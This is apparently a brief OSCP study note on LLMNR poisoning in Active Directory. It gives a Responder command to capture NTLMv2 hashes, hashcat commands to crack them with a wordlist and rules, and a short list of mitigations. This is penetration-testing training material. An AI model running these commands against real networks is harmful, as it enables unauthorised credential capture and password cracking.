// notes/ Active Directory
🏛️
Initial Attack Strategy Llmnr Poisoning
Link Local Multicast Name Resolution (LLMNR), is used to identify hosts when DNS fails to do so in the network.
#active directory#adot8
source · oscp.adot8.com · active-directory/initial-attack-strategy_llmnr-poisoning ↗LLMNR Poisoning
Overview
Link Local Multicast Name Resolution (LLMNR), is used to identify hosts when DNS fails to do so in the network.
The main flaw with LLMNR is that the services use a user's username and NTLMv2 hash when responded to
<figure><img src="/files/7Lr3l7v2mf2ADr8Y7hzf" alt=""><figcaption><p>Captured hash example from Kali Forums</p></figcaption></figure>Responder
bash
$sudo responder -I eth0 -dwvCrack NTLM Hashes
bash
$hashcat -m 5600 crackme.txt ~/rockyou.txt -O$hashcat -m 5600 crackme.txt ~/rockyou.txt -r OneRule.ruleMitigation
- Best defense is to disable LLMNR and NBT-NS
- Strong password policy (14 char)